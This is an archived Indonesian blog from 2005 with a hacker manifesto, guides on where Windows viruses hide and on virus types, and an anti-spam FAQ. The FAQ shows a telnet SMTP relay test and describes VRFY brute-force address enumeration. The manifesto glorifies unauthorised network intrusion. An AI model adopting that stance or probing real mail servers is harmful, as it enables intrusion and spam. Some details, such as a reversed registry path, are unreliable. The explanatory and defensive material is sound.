indogambler.com

Senin, Februari 28, 2005

New Hacking Manifesto

New Hacking Manifesto

It happened again today. Another one sold out, sacrificing their dreams
to the corporate security machine.

Damn whitehats, noone believes in a cause anymore.

Another bug was released today to the security mailing lists.

Damn Whitehats, they know not what they do.

Another potential computer genius was relegated to an existence of nothing
more than a 9-5 cubicle-dwelling promotional tool.

Damn whitehats, putting money before discovery.

Another family was ravaged by cooperations and governments bent on
instituting control over individuality, monitoring every action..

Another kid was sentenced today for searching for a way to understand
the world. Convicted and imprisoned, not because of what he did, but
because of what others thought he could do.

Damn Whitehats - Fear keeps them in business.

The public, believing anything it hears from "reputed experts". Screaming
for blood. Looking for something to blame for their lost hope. Their
lost ability to seek out new knowledge. Fear consumes them. They cannot
let go of their uncertainty and doubt because there is no meaning. They
seek to destroy explorers, outlaws, curiosity seekers because they are
told too. They are told these people that seek information are evil.
Individuality is evil. Judgment should be made based upon a moral
standard set in conformity rather than resistance. Lives are ruined in
the name of corporate profit and information is hoarded as a commodity.

Damn Whitehats, you were once like us.

I was a Whitehat. I had an awakening. I saw the security industry for
what is really is. I saw the corruption, the lies, the deceit, the
extortion of protection money in the form of subscription services and
snake-oil security consultants.

I wanted to know, I wanted to understand, I wanted to go further then
the rest. I never want to be held down by contracts and agreements.

You say I should grow up. You say I should find better things to do with
my time. You say I should put my talent to better use. You're saying I
should fall in line with the other zombies and forget everything I
believe in and shun those with my drive, my curiosity, tell them it's
not worth it, deny them of the greatest journey they will ever
experience in their lives.

I am not a blackhat. The term is insulting, it implies I am the opposite
of you. You think i seek to defeat security, when I seek something
greater. I will write exploits, travel through networks, explore where
you are afraid to go. I will not put myself in the spotlight and release
destructive tools to the public to attract business. I will not feed
the fear and hysteria created by the security industry to increase stock
prices. I can, and will, code and hack and find out everything I can
for the same reasons I did years ago.

I am a Hacker, dont try to understand me, you lost all hope of that when
you crossed the line. You fail to see the lies and utter simplicity
behind the computer security industry. Once, you may have shared my
ideals. You fail to see the fact that security is a maintenance job.
Youve given up hope for something better. You fail to see yourself as
worthless, fueling an industry whose cumulative result is nothing. I
dont hate you, I dont even really care about you - If you try to stop me,
you will fail, because I do this out of love -- you do it for money.

This is our world now.. the world of the electron and the switch, the
beauty of the baud. We make use of a service already existing without
paying for what could be dirt cheap if it wasn't run by profiteering
gluttons, and you call us criminals. We explore... and you call us
criminals. We seek after knowledge... and you call us criminals. We
exist without skin color, without nationality, without religious bias...
and you call us criminals. You build atomic bombs, you wage wars, you
murder, cheat and lie to us and try to make us belive it is for our own
good, yet we're the ciminals.

Yes, I am a criminal. My crime is that of curiosity. My crime is that of
judging people by what they say and think, not what they look like. My
crime is that of outsmarting you, something that you will never forgive
me for.

I am a hacker, and this is my manifesto. You can't stop me, and you
certainly can't stop us all.
Read rest of entry

Sabtu, Februari 26, 2005

Mendeteksi Virus

Arikel Ini hanya untuk para newbie dan sudah beredar di internet sejak lama saya hanya menjadikan bahan dokumentasi.

Tempat-tempat tersebut antara lain :

1. START-UP FOLDER
Windows akan membuka semua items yang ada di start Menu Start Up Folder . Untuk
contohnya silakan anda menaruh text apa dari notepad di start up Menu , maka windows
akan menjalankannya ketika start .
2. REGISTRY
Windows akan menjalankan semua instruksi yaang ada di " Run ",untuk mengetahui
program2 yang dijalankan windows , masuk ke regedit
-> HKLM\Software\Windows\Microsoft\CurrentVersion
\Run
-> HKLM\Software\Windows\Microsoft\CurrentVersion
\RunServices
-> HKLM\Software\Windows\Microsoft\CurrentVersion
\RunOnce
-> HKLM\Software\Windows\Microsoft\CurrentVersion
\RunServicesOnce
.
3. REGISTRY
selain diatas ada kemungkinan virus dan trojan menyembunyikan dirinya di
: HKEY_CLASSES_ROOT\exefile\shell\open\command "%1" %*atau kemungkinan2 yg lain :
[HKEY_CLASSES_ROOT\exefile\shell\open\command] ="\"%1\" %*"
[HKEY_CLASSES_ROOT\comfile\shell\open\command] ="\"%1\" %*"
[HKEY_CLASSES_ROOT\batfile\shell\open\command] ="\"%1\" %*"
[HKEY_CLASSES_ROOT\htafile\Shell\Open\Command] ="\"%1\" %*"
[HKEY_CLASSES_ROOT\piffile\shell\open\command] ="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\batfile
\shell\open\command] ="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\comfile
\shell\open\command] ="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\exefile
\shell\open\command] ="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\htafile
\Shell\Open\Command] ="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\piffile
\shell\open\command] ="\"%1\" %*"
Dalam keadaan default key \"%1\" %*" dan apabila diganti
"\"xxx.exe %1\" %*" kemungkinan dari itu adalah virus atau trojan
4. BATCH FILE
Batch file merupakan file batch dana windows akan menjalankan file2 yang terdapat
pada batch file , untuk windows 9x bernama autoexec.bat dan untuk windowsNT berada
di Winnt\WINSTART.BAT .
5. INITIALIZATION FILE
Windows menjalankan perintah-perintah yang ada di "RUN= " dalam file win.ini untuk
win9x dan winnt
Selain "Run=" ada juga di " LOAD=" pada win.ini
"load=" ada didalam shell syetem.ini untuk win9x letaknya di c:\>windows\system.
ini dan pada perintah
[boot]
shell=explorer.exe C:\windows\filename
6. TIPE C:\EXPLORER.EXE
C:\Explorer.exe
Windows akan menjalankan explorer.exe pada setiap memulai start ,
apa bila explorer.exe coruprt ada kemungkinan explorer.exe terkena virus atau
trojan dan akan mereboot komputer . selain tempat2 persembunyian virus
dan trojan diatas ada kemungkinan mereka terdapat dalam tempat yang sama sekali
tidak terditeksi ,sebagai contoh pada trojan Trojan SubSeven 2.2.dia
menyembunyikan dirinya di :

HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
\Currentversion\explorer\Usershell folders

Icq Inet
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ
\Agent\Apps\test]
"Path"="test.exe"
"Startup"="c:\\test"
"Parameters"=""
"Enable"="Yes"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ
\Agent\Apps\]
Key teserabut menjalankan secara khusus apaliasi icq net.

[HKEY_LOCAL_MACHINE\Software\CLASSES
\ShellScrap] ="Scrap object"
"NeverShowExt"=""

Bacaan/Referensi : -> viruslist.com
-> symantec.com
Read rest of entry

VIRUS Komputer

PENGANTAR

Saat Ini, pastilah kita semua selaku konsumen/pengguna jasa komputer dan
jaringan ( internet ) sudah sangat sering mendengar istilah ‘virus’ yang
terkadang meresahkan kita. Tulisan ini akan mengupas lebih jauh mengenai
virus, yang nantinya diharapkan dapat membuat kita semua mengerti dan
memahami tentang virus.

A.ASAL MUASAL VIRUS

1949, John Von Neuman, menggungkapkan " teori self altering automata "
yang merupakan hasil riset dari para ahli matematika.

1960, lab BELL (AT&T), para ahli di lab BELL (AT&T) mencoba-coba teori
yang diungkapkan oleh john v neuman, mereka bermain-main dengan teori
tersebut untuk suatu jenis permainan/game. Para ahli tersebut membuat
program yang dapat memperbanyak dirinya dan dapat menghancurkan program
buatan lawan.Program yang mampu bertahan dan menghancurkan semua program
lain, maka akan dianggap sebagai pemenangnya. Permainan ini akhirnya
menjadi permainan favorit ditiap-tiap lab komputer.semakin lama mereka
pun sadar dan mulai mewaspadai permainan ini dikarenakan program yang
diciptakan makin lama makin berbahaya, sehingga mereka melakukan
pengawasan dan pengamanan yang ketat.

1980, program tersebut yang akhirnya dikenal dengan nama "virus" ini
berhasil menyebar diluar lingkungan laboratorium, dan mulai beredar di
dunia cyber.

1980, mulailah dikenal virus-virus yang menyebar di dunia cyber.

B.PENGERTIAN VIRUS

" A program that can infect other programs by modifying them to include
a slighty altered copy of itself.A virus can spread throughout a computer
system or network using the authorization of every user using it to
infect their programs. Every programs that gets infected can also act as
a virus that infection grows “
( Fred Cohen )

Pertama kali istilah “virus” digunakan oleh Fred Cohen pada tahun 1984 di
Amerika Serikat. Virus komputer dinamakan “Virus” karena memiliki beberapa
persamaan mendasar dengan virus pada istilah kedokteran(biological viruses).

Virus komputer bisa diartikan sebagai suatu program komputer biasa.Tetapi
memiliki perbedaan yang mendasar dengan program-program lainnya,yaitu
virus dibuat untuk menulari program-program lainnya, mengubah,
memanipulasinya bahkan sampai merusaknya. Ada yang perlu dicatat disini,
virus hanya akan menulari apabila program pemicu atau program yang telah
terinfeksi tadi dieksekusi, disinilah perbedaannya dengan "worm". Tulisan
ini tidak akan bahas worm karena nanti akan mengalihkan kita dari
pembahasan mengenai virus ini.

C.KRITERIA VIRUS

Suatu program yang disebut virus baru dapat dikatakan adalah benar benar
virus apabila minimal memiliki 5 kriteria :

1. Kemampuan suatu virus untuk mendapatkan informasi
2. Kemampuannya untuk memeriksa suatu program
3. Kemampuannya untuk menggandakan diri dan menularkan
4. Kemampuannya melakukan manipulasi
5. Kemampuannya untuk menyembunyikan diri.

Sekarang akan coba dijelaskan dengan singkat apa yang dimaksud dari tiap
-tiap kemampuan itu dan mengapa ini sangat diperlukan.

1.Kemampuan untuk mendapatkan informasi

Pada umumnya suatu virus memerlukan daftar nama-nama file yang ada dalam
suatu directory, untuk apa? agar dia dapat mengenali program program apa
saja yang akan dia tulari,semisal virus makro yang akan menginfeksi semua
file berekstensi *.doc setelah virus itu menemukannya, disinilah kemampuan
mengumpulkan informasi itu diperlukan agar virus dapat membuat daftar/
data semua file, terus memilahnya dengan mencari file-file yang bisa
ditulari.Biasanya data ini tercipta saat program yang tertular/terinfeksi
atau bahkan program virus ini dieksekusi. Sang virus akan segera melakukan
pengumpulan data dan menaruhnya di RAM (biasanya :P ) , sehingga apabila
komputer dimatikan semua data hilang tetapi akan tercipta setiap program
bervirus dijalankan dan biasanya dibuat sebagai hidden file oleh virus .

2.Kemampuan memeriksa suat program

Suatu virus juga harus bias untuk memeriksa suatu program yang akan
ditulari, misalnya ia bertugas menulari program berekstensi *.doc, dia
harus memeriksa apakah file dokumen ini telah terinfeksi ataupun belum,
karena jika sudah maka dia akan percuma menularinya 2 kali. Ini sangat
berguna untuk meningkatkan kemampuan suatu virus dalam hal kecepatan
menginfeksi suatu file/program.Yang umum dilakukan oleh virus adalah
memiliki/ memberi tanda pada file/program yang telah terinfeksi
sehingga mudah untuk dikenali oleh virus tersebut . Contoh penandaan
adalah misalnya memberikan suatu byte yang unik disetiap file yang
telah terinfeksi.

3.Kemampuan untuk menggandakan diri

Kalo ini emang virus "bang-get", maksudnya tanpa ini tak adalah virus.
Inti dari virus adalah kemampuan mengandakan diri dengan cara menulari
program lainnya. Suatu virus apabila telah menemukan calon korbannya
(baik file atau program) maka ia akan mengenalinya dengan memeriksanya,
jika belum terinfeksi maka sang virus akan memulai aksinya untuk menulari
dengan cara menuliskan byte pengenal pada program/ file tersebut,dan
seterusnya mengcopikan/menulis kode objek virus diatas file/program
yang diinfeksi. Beberapa cara umum yang dilakukan oleh virus untuk
menulari/ menggandakan dirinya adalah:

a.File/Program yang akan ditulari dihapus atau diubah namanya. kemudian
diciptakan suatu file menggunakan nama itu dengan menggunakan virus
tersebut (maksudnya virus mengganti namanya dengan nama file yang dihapus)
b.Program virus yang sudah di eksekusi/load ke memori akan langsung
menulari file-file lain dengan cara menumpangi seluruh file/program
yang ada.

4.Kemampuan mengadakan manipulasi

Rutin (routine) yang dimiliki suatu virus akan dijalankan setelah virus
menulari suatu file/program. isi dari suatu rutin ini dapat beragam
mulai dari yang teringan sampai pengrusakan. rutin ini umumnya digunakan
untuk memanipulasi program ataupun mempopulerkan pembuatnya! Rutin ini
memanfaatkan kemampuan dari suatu sistem operasi (Operating System) ,
sehingga memiliki kemampuan yang sama dengan yang dimiliki sistem
operasi. misal:

a.Membuat gambar atau pesan pada monitor
b.Mengganti/mengubah ubah label dari tiap file,direktori,atau label dari
drive di pc
c.Memanipulasi program/file yang ditulari
d.Merusak program/file
e.Mengacaukan kerja printer , dsb

5.Kemampuan Menyembunyikan diri

Kemampuan Menyembunyikan diri ini harus dimiliki oleh suatu virus agar semua
pekerjaan baik dari awal sampai berhasilnya penularan dapat terlaksana.
langkah langkah yang biasa dilakukan adalah:

-Program asli/virus disimpan dalam bentuk kode mesin dan digabung dengan
program lain yang dianggap berguna oleh pemakai.
-Program virus diletakkan pada Boot Record atau track yang jarang
diperhatikan oleh komputer itu sendiri
-Program virus dibuat sependek mungkin, dan hasil file yang diinfeksi tidak
berubah ukurannya
-Virus tidak mengubah keterangan waktu suatu file
-dll


D.SIKLUS HIDUP VIRUS

Siklus hidup virus secara umum, melalui 4 tahap:

o Dormant phase ( Fase Istirahat/Tidur )
Pada fase ini virus tidaklah aktif. Virus akan diaktifkan oleh suatu kondisi
tertentu, semisal:tanggal yang ditentukan,kehadiran program lain/dieksekusinya
program lain, dsb. Tidak semua virus melalui fase ini

o Propagation phase ( Fase Penyebaran )
Pada fase ini virus akan mengkopikan dirinya kepada suatu program atau
ke suatu tempat dari media storage (baik hardisk, ram dsb). Setiap
program yang terinfeksi akan menjadi hasil “klonning” virus tersebut
(tergantung cara virus tersebut menginfeksinya)

o Trigerring phase ( Fase Aktif )
Di fase ini virus tersebut akan aktif dan hal ini juga di picu oleh beberapa
kondisi seperti pada Dormant phase

o Execution phase ( Fase Eksekusi )
Pada Fase inilah virus yang telah aktif tadi akan melakukan fungsinya.
Seperti menghapus file, menampilkan pesan-pesan, dsb


E.JENIS – JENIS VIRUS

Untuk lebih mempertajam pengetahuan kita tentang virus, Aku akan coba
memberikan penjelasan tentang jenis-jenis virus yang sering berkeliaran
di dunia cyber.

1.Virus Makro
Jenis Virus ini pasti sudah sangat sering kita dengar.Virus ini ditulis
dengan bahasa pemrograman dari suatu aplikasi bukan dengan bahasa
pemrograman dari suatu Operating System. Virus ini dapat berjalan apabila
aplikasi pembentuknya dapat berjalan dengan baik, maksudnya jika pada
komputer mac dapat menjalankan aplikasi word maka virus ini bekerja pada
komputer bersistem operasi Mac.
contoh virus:

-variant W97M, misal W97M.Panther
panjang 1234 bytes,
akanmenginfeksi NORMAL.DOT dan menginfeksi dokumen apabila dibuka.
-WM.Twno.A;TW
panjang 41984 bytes,
akan menginfeksi Dokumen Ms.Word yang menggunakan bahasa makro, biasanya
berekstensi *.DOT dan *.DOC
-dll

2.Virus Boot Sector
Virus Boot sector ini sudah umum sekali menyebar.Virus ini dalam menggandakan
dirinya akan memindahkan atau menggantikan boot sector asli dengan program
booting virus. Sehingga saat terjadi booting maka virus akan di load kememori
dan selanjutnya virus akan mempunyai kemampuan mengendalikan hardware standar
(ex::monitor, printer dsb) dan dari memori ini pula virus akan menyebar
eseluruh drive yang ada dan terhubung kekomputer (ex: floopy, drive lain
selain drive c).
contoh virus :

-varian virus wyx
ex: wyx.C(B) menginfeksi boot record dan floopy ;
panjang :520 bytes;
karakteristik : memory resident dan terenkripsi)
-varian V-sign :
menginfeksi : Master boot record ;
panjang 520 bytes;
karakteristik: menetap di memori (memory resident),terenkripsi, dan polymorphic)
-Stoned.june 4th/ bloody!:
menginfeksi : Master boot record dan floopy;
panjang 520 bytes;
karakteristik: menetap di memori (memory resident), terenkripsi dan menampilkan
pesan"Bloody!june 4th 1989" setelah komputer melakukan booting sebanyak 128 kali

3.Stealth Virus
Virus ini akan menguasai tabel tabel interupt pada DOS yang sering kita kenal
dengan "Interrupt interceptor" . virus ini berkemampuan untuk mengendalikan
instruksi instruksi level DOS dan biasanya mereka tersembunyi sesuai namanya
baik secara penuh ataupun ukurannya .
contoh virus:
-Yankee.XPEH.4928,
menginfeksi file *.COM dan *.EXE ;
panjang 4298 bytes;
karakteristik: menetap di memori, ukurantersembunyi, memiliki pemicu
-WXYC (yang termasuk kategori boot record pun karena masuk kategri stealth
dimasukkan pula disini), menginfeksi floopy an motherboot record;
panjang 520 bytes;
menetap di memori; ukuran dan virus tersembunyi.
-Vmem(s):
menginfeksi file file *.EXE, *.SYS, dan *.COM ;
panjang fie 3275 bytes;
karakteristik:menetap di memori, ukuran tersembunyi, di enkripsi.
-dll

4.Polymorphic Virus
Virus ini Dirancang buat mengecoh program antivirus,artinya virus ini selalu
berusaha agar tidak dikenali oleh antivirus dengan cara selalu merubah rubah
strukturnya setiap kali selesai menginfeksi file/program lain.

contoh virus:

-Necropolis A/B,
menginfeksi file *.EXE dan *.COM;
panjang file 1963 bytes;
karakteristik: menetap di memori, ukuran dan virus tesembunyi,terenkripsi dan
dapat berubah ubah struktur
-Nightfall,
menginfeksi file *.EXE;
panjang file 4554 bytes;
karakteristik : menetap di memori, ukuran dan virus tesembunyi,memiliki pemicu,
terenkripsidan dapat berubah-ubah struktur
-dll


5.Virus File/Program
Virus ini menginfeksi file file yang dapat dieksekusi langsung dari sistem operasi,
baik itu file application (*.EXE), maupun *.COm biasanya juga hasil infeksi
dari virus ini dapat diketahui dengan berubahnya ukuran file yang diserangnya.


6.Multi Partition Virus
Virus ini merupakan gabungan dariVirus Boot sector dan Virus file: artinya
pekerjaan yang dilakukan berakibat dua, yaitu dia dapat menginfeksi file-
file *.EXE dan juga menginfeksi Boot Sector.



F.BEBERAPA CARA PENYEBARAN VIRUS

Virus layaknya virus biologi harus memiliki media untuk dapat menyebar,virus
computer dapat menyebar keberbagai komputer/mesin lainnya juga melalui berbagai
cara, diantaranya:

1.Disket, media storage R/W
Media penyimpanan eksternal dapat menjadi sasaran empuk bagi virus untuk
dijadikan media. Baik sebagai tempat menetap ataupun sebagai media penyebarannya.
Media yang bias melakukan operasi R/W (read dan Write) sangat memungkinkan untuk
ditumpangi virus dan dijadikan sebagai media penyebaran.

2.Jaringan ( LAN, WAN,dsb)
Hubungan antara beberapa computer secara langsung sangat memungkinkan suatu
virus ikut berpindah saat terjadi pertukaran/pengeksekusian file/program
yang mengandung virus.

3.WWW (internet)
Sangat mungkin suatu situs sengaja di tanamkan suatu ‘virus’ yang akan
menginfeksi komputer-komputer yang mengaksesnya.

4.Software yang Freeware, Shareware atau bahkan Bajakan
Banyak sekali virus yang sengaja di tanamkan dalam suatu program yang di
sebarluaskan baik secara gratis, atau trial version yang tentunya sudah
tertanam virus didalamnya.

5.Attachment pada Email, transferring file
Hampir semua jenis penyebaran virus akhir-akhir ini menggunakan email attachment
dikarenakan semua pemakai jasa internet pastilah menggunakan email untuk
berkomunikasi, file-file ini sengaja dibuat mencolok/menarik perhatian, bahkan
seringkali memiliki ekstensi ganda pada penamaan filenya.


G.PENANGULANGANNYA

1.Langkah-Langkah untuk Pencegahan
Untuk pencegahan anda dapat melakukan beberapa langkah-langkah berikut :
o Gunakan Antivirus yang anda percayai dengan updatean terbaru, tdak
perduli appun merknya asalkan selalu di update, dan nyalakan Auto protect
o Selalu men-scan semua media penyimpanan eksternal yang akan di gunakan,
mungkin hal ini agak merepotkan tetapi jika Autoprotect anti virus anda
bekerja maka prosedur ini dapat dilewatkan.
o Jika Anda terhubung langsung ke Internet cobalah untuk mengkombinasikan
Antivirus anda dengan Firewall, Anti spamming, dsb

2.Langkah-Lagkah Apabila telah Terinfeksi

o Deteksi dan tentukan dimanakah kira-kira sumber virus tersebut apakah disket,
jaringan, email dsb, jika anda terhubung ke jaringan maka ada baiknya anda
mengisolasi computer anda dulu (baik dengan melepas kabel atau mendisable
dari control panel)
o Identifikasi dan klasifikasikan jenis virus apa yang menyerang pc anda,
dengan cara:
- Gejala yang timbul, misal : pesan, file yang corrupt atau hilang dsb
- Scan dengan antivirus anda, jika anda terkena saat Autoprotect berjalan
berarti vius definition di computer anda tidak memiliki data virus ini,
cobalah update secara manual atau mendownload virus definitionnya untuk
anda install. Jika virus tersebut memblok usaha anda untuk mengupdatenya
maka ,upayakan untuk menggunakan media lain (komputer) dengan antivirus
updatean terbaru.
o Bersihkan, setelah anda berhasil mendeteksi dan mengenalinya maka usahakan
segera untuk mencari removal atau cara-cara untuk memusnahkannya di situs
-situs yang memberikan informasi perkembangan virus. Hal ini jika antivirus
update-an terbaru anda tidak berhasil memusnahkannya.
o Langkah terburuk, jika semua hal diatas tidak berhasil adalah memformat
ulang komputer anda .

PENUTUP

Semoga pembahasan mengenai Virus ini dapat memberikan manfaat khususnya
bagi penulis yang sedang belajar dan bagi kita semua umumnya, Tulisan
ini ditujukan untuk pembelajaran semata sehingga sangat diharapkan kritik
dan sarannya. Apabila banyak kekurangan pada tulisan ini harap dimaklumi.

REFERENSI

1.[ Stallings, William ],“CRYPTOGRAPHY AND NETWORK SECURITY,principle
and practice: second edition ” ,Prentice-Hall,Inc., New Jersey ,1999
2.[ Salim, IR.Hartojo ],“Virus Komputer, teknik pembuatan & langkah-
langkah penaggulangannya ,Andi OFFSET,Yogyakarta , 1989.
3.[ Amperiyanto, Tri ],“Bermain-main dengan Virus Macro”,Elex Media
Komputindo, Jakarta,2002
4.[ Jayakumar ], “ Viruspaperw.pdf ”, EBOOK version
5.[ y3dips ],“pernak pernik Virus”,http://ezine.echo.or.id,Jakarta,2003
6.“ Virus Definition dari salah satu Antivirus ”
Read rest of entry

Jumat, Februari 25, 2005

Anti Spamer Indonesia

Tutorial Anti Spam

Oleh: Irwan Hadi

Berikut adalah pertanyaan yang sering ditujukan ke milis mengenai spam dan
jawabannya
1. Apakah Spam itu ?
Spam adalah pengiriman surat kepada orang yang tidak kenal yang biasanya
berisi penawaran mengenai business.

2. Kalau spammer ?
Spammer adalah orang yang melakukan spam tadi

3. Junk mail ?
Junk mail terus terang sangat luas cakupannya, misalnya spam tadi
sebetulnya bisa dikategorikan junk mail, atau contoh lain anda mengirimkan
pesan UNSUBSCRIBE ke milis juga termasuk junk, jadi secara garis besar ,
junk mail berarti :
- Bagi Mailling List : message yang tidak ada hubungannya dengan milis
tersebut
- Bagi user : message yang tidak kita kehendaki, misalnya teman anda
mengirimkan tawaran kerja di perusahaannya ke anda atau anda mengirimkan lamaran kerja dengan melebihi 1 lamaran diperusahaan yang sama, itu junk.

4. Bagaimana caranya menghindari spam ?
Anda tidak dapat dapat menghindarinya jika anda menjadi anggota komunitas
internet yang aktif , misalnya dalam hal ini sering ikut mailling list.
Bahkan jika anda pasif sekalipun, anda dapat pula menerima spam tadi. Lho
bagaimana caranya ?
Bisa saja anda ikut mailling list, tapi anda tidak pernah posting, tapi
karena mailling list tersebut mengijinkan user untuk mendapatkan list
subscriber milis tadi, dari situ ia dapat mendapatkan alamat anda. Selain
itu, adanya suatu kelemahan di standard RFC untuk SMTP dimana anda dapat
mengetahui suatu user name ada atau tidak di server tadi dengan melakukan
telnet port 25, lalu ketik VRFY username, maka dari sini spammer dengan
cara brute forte (dicobain dari 0 sampe 10, a sampe zzzzzzzz (8 karakter
kan biasanya ?) )dapat mengetahui email email address yang ada di server itu.
Pencegahan sudah ada, dengan cara mendisable perintah VRFY tadi, misalnya
postfix patch terbaru, atau Qmail (CMIIW)

5. Apa yang harus saya lakukan jika menerima spam ?
Pertama jangan takut, sebab spam tidak sama dengan mail bomb, umumnya spam
yang anda terima tidak akan mencapai puluhan per hari, terkadang hanya 1
per minggu.
Jika anda malas, anda tinggal delete spam tadi, persoalan beres.
Tapi jika anda penasaran dan ingin membereskan spammer tadi, ada langkah
langkah yang harus anda lakukan berikut. Percuma anda me mail bomb orang
tadi, karena selain buang buang waktu, biasa alamat yang diberikan oleh
spammer tadi adalah fake address, jadi .... percuma kan ?

6. Cara spammer menyebarkan spam
Hal ini dibedakan menjadi 3 yaitu :
- Direct to MX spamming
- Spamming melalui mail server yang open relay

Kita akan membahasnya berikut
- Direct to MX spamming
Ilustrasinya adalah begini, ambillah suatu provider yang mail servernya
tidak open relay, misalnya cbn , dimana jika anda misalnya menggunakan
centrin.net dan anda ingin mengganti SMTP server anda dari
smtp.centrin.net.id / mail/bdg/sby.centrin.net.id menjadi
mail.cbn.net.id/smtp.cbn.net.id maka anda tidak akan dapat. Begitu anda
ingin coba kirim surat ke misalnya saya di iname.com , maka mail server cbn
tadi akan menolak, alhasil suratnya nggak bakalan kekirim. Tapi kalau anda
ingin mengirimkan surat ke sianu@cbn.net.id , maka anda dapat.

Untuk jelasnya coba anda jalankan telnet (start-run-telnet.exe)
lalu anda alt-connect-remote isikan misalnya mail.cbn.net.id (TAPI ANDA
HARUS MENGGUNAKAN PROVIDER SELAIN CBN), pada portnya anda isikan 25 lalu enter
lalu anda ketik
HELO
mail from: dodolgarut@centrin.net.id
rcpt to: dodolmanis@centrin.net.id
Maka akan ada tulisan Sorry we do not relay, atau This host is not in my
rcpthosts, atau sebagainya

Tapi misalnya anda konek menggunakan cbn.net.id maka setelah anda mengetik
rcpt to: dodolmanis@centrin.net.id
maka di sampingnya akan ada tulisan ok, tanda anda boleh menggunakan mail
server cbn tadi untuk mengirim ke dodolmanis@centrin.net.id
Setelah itu anda ketik
DATA
lalu isi messagenya dan diakhir dengan . (titik) lalu enter

Maka akan ada pesan bahwa message anda telah diaccept dengan diberi nomor ,
lalu siap untuk dikirim

[tapi jika anda konek dengan cbn, dan anda ingin mencoba, maka anda boleh
mencoba dengan smtp lain yang tidak open relay misalnya
smtp.centrin.net.id, atau mail.bit.net.id)

TAPI jika pada contoh di atas, misalnya anda konek dengan centrin, terus
mencoba dengan mail.cbn.net.id , lalu pada RCPT TO: anda isikan
sidodol@cbn.net.id , maka pasti bisa.

Nah pada direct to MX spamming hal ini sama juga, misalnya pada hotmail,
dengan pelanggan 60 juta, dan si spammer sudah punya 100 ribu address di
hotmail yang akan dispamming, maka ia tinggal telnet port 25 di
mail.hotmail.com , lalu pada rcpt to: nya ia tinggal isikan semua address
yang ia tujukan, padahal mail.hotmail.com itu tidak open relay.

Jadi pada intinya Direct to MX spamming adalah penggunaan mail server
tempat si target yang ingin dispam , untuk menyepam dia .
Contohnya dari header surat yang diterima adalah :
----------------------------------------------------
From: Save Address Block Sender
Subject: Congratulations!
Date: Sat, 18 Dec 1999 11:29:35
MIME-Version: 1.0
Received: from [38.30.13.169] by hotmail.com (3.2) with ESMTP id
MHotMailBA2502CC0010D820F3BC261E0DA90F640; Sat Dec
18 08:35:29 1999
From sender994@mindspring.com Sat Dec 18 08:49:04 1999
Message-Id: <480.595739.647571@mindspring.com>
-------------------------------------------------------
Tampak, bahwa seseorang dengan IP 38.30.13.169 konek langsung ke
hotmail.com untuk menyepamm email account saya di hotmail, pada sat dec 18
, jam 08:35:29 tahun 1999 waktu hotmail, padahal waktu di komputer spammer
tadi sat dec 18 08:39:04 1999

Nah itu pada message idnya ada tulisan mindspring.com , yaitu salah satu
provider terbesar di Indonesia, itu hanya untuk mengecoh orang yang masih
"newbie" dalam soal spam menyepamm, agar dikira dia konek pakai
mindspring.com, padahal sebetulnya dia si 38.30.13.169 tadi, pake PSI.net
coba lihat hasil lookup berikut
--------------------------------------------
Host name: ip169.isdn14.800.psi.net
IP address: 38.30.13.169
Alias(es): None
--------------------------------------------

jadi ternyata si 38.30.13.169, dengan nama lainnya adalah
ip169.isdn14.800.psi.net, yang menyepamm saya,.
Wah sudah, tinggal saya kirimkan surat ke abuse@psi.net, minta agar si
spammer ini dibereskan, dab biasanya kalau di amerika itu beneran
dibereskan, bahkan biasanya account di disable (ditutup), contohnya
-----------------------------------------------
Date: Thu, 23 Dec 1999 16:17:16 -0500 (EST)
Message-Id: <199912232117.QAA03498@utility1.troy.psi.com>
X-Loop-Detect: PSINet/nab
X-UIDL: 945997405.158
From: Net Abuse Team
To: irwanhadi@iname.com
Subject: Re: Increase Your Revenues and Pay Your Bills ! (27026) #nab-1629170
Status: U

Hello,

Please be advised that the account used to violate our Net-Abuse
Policy has been disabled. If you receive any further correspondence
from this source, please let us know.

When submitting a complaint to PSINet, please include the SUBJECT
LINE of the spam in the subject of your e-mail.

Thank you.

Net-Abuse Team
PSINet, Inc.
abuse@psi.com
http://www.psinet.com/legalinfo/netabusepolicy.html

-----------------------------------------------------

Nggak seperti di Indonesia sini, boro boro di disabled, mau ditegor aja si
spammer sama adminnya juga udah bagus.
Terus terang saja berdasarkan pengalaman saya selama ini, provider di
Indonesia yang terbaik dalam soal komplain spam adalah CBN, dan yang paling
buruk, hehehehee C.NTR.N
Yang lain nggak tau, soalnya belum pernah ada orang nyepamm lewat provider
lain ke saya.

Pada account hotmail saya, biasanya ada 4 provider besar yang kebetulan
usernya sangat banyak juga, yang suka direct to MX spamming , mereka yaitu
uu.net, biasa dengan IP di kepala 6x.xxx.xxx.xxx
PSI Net , biasa di IP kepala 3x.xxx.xxx.xxx
BBNPlanet, biasa di IP 4.xxx.xxx.xxx
Aol . biasa di 16x.xxx.xxx.xxx

- Spamming melalui mail server yang open relay
Jika anda telah mengerti Direct to MX spamming, maka anda dengan mudah
mengerti yang ini, dimana sama seperti pada direct to MX spamming, tapi
pada mail server yang open relay, begitu anda ketik rcpt to:
somebody@somesite.com , maka dia akan ok

Contohnya adalah berikut ini
------------------------------------------
>Received: from rmx09.globecomm.net (rmx09.iname.net [165.251.8.95]) by
>dpnegoro.bit.net.id (8.8.5/BITNET5) with ESMTP id XAA22356 for
>; Sun, 31 Oct 1999 23:04:48 GMT
>Received: from smv15.iname.net by rmx09.globecomm.net (8.9.1/8.8.0) with
>SMTP id RAA10078 ; Sun, 31 Oct 1999 17:59:21 -0500 (EST)
>Received: from data99.cz (www.data99.cz [193.179.185.105])
> by smv15.iname.net (8.9.3/8.9.1SMV2) with ESMTP id RAA22733;
> Sun, 31 Oct 1999 17:56:41 -0500 (EST)
>Received: from fij909 [38.26.242.169] by data99.cz with ESMTP
> (SMTPD32-5.05) id A9001180180; Sun, 31 Oct 1999 23:56:00 +0100
>From: "Rudy"
>Subject: Want More Sales?
>To: look38j@iname.net
>X-Mailer: Microsoft Outlook Express 4.72.1712.3
>X-MimeOLE: Produced By Microsoft MimeOLE V(null).1712.3
>Mime-Version: 1.0
